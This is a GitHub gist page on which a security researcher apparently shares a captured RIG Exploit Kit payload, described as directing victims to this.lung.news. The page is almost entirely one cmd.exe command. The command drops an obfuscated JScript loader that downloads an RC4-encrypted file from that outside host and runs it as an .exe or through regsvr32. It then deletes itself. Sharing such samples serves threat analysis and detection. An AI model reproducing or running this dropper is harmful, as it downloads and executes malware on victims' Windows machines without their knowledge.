Skip to content

Instantly share code, notes, and snippets.

@brad-anton
Created January 11, 2017 16:25
Show Gist options
  • Save brad-anton/09fc7c85f8130a7074e1f71c8919af22 to your computer and use it in GitHub Desktop.
Save brad-anton/09fc7c85f8130a7074e1f71c8919af22 to your computer and use it in GitHub Desktop.
RIG Exploit Kit Payload directing Victims to this.lung.news
cmd.exe /q /c cd /d "%tmp%" && echo function O(n,g){for(var c=0,s=String,d,D="pu"+"sh",b=[],i=[],r=255,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g.length)^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,S="fromCharCode";e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};function H(g){var T=u(0),d=W(T+"."+T+u(1));d["setProxy"](n);d.open(u(2),g(1),n);d.Option(0)=g(2);d["Sen\x64"];if(0310==d.status)return O(d.responseText/**/,g(n))};T="WinHTTPMRequ";E=T+"est.5.1MGETMScripting.FileSystemObjectMWScript.ShellMADODB.StreamMeroM.ex",u=function(x){return E.split("M")[x]},J=ActiveXObject,W=function(v){return new J(v)};try{E+="eMGetTempNameMcharCodeAtMiso-8859-1MMindexOfM.dllMScriptFullNameMjoinMr\x75nM /c M /\x73 ";var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=WScript,L=U[u(14)],v=u(9),m=U.Arguments;s.Type=2;c=q[u(8)]();s.Charset=u(012);s.Open();i=H(m);d=i[v](i[u(12)]("P\x45\x00"+"\x00")+027);s.writetext(i);if(037^<d){var z=1;c+=u(13)}else c+=p;s["save"+"tofile"](c,2);s.Close();Q=u(18);P=p+Q+c;z^&^&(c="re"+"gsvr"+040+/*QW*/P);j["r"+"un"]("c\x6Dd"+p+u(17)+c,0)}catch(Y){}R="Deletefile";q[R](L);>QTTYUADAF && start wscript //B //E:JScript QTTYUADAF "gexywoaxor" "http://this.lung.news/?q=OMITTEDOMITTED" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; rv:11.0) like Gecko"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment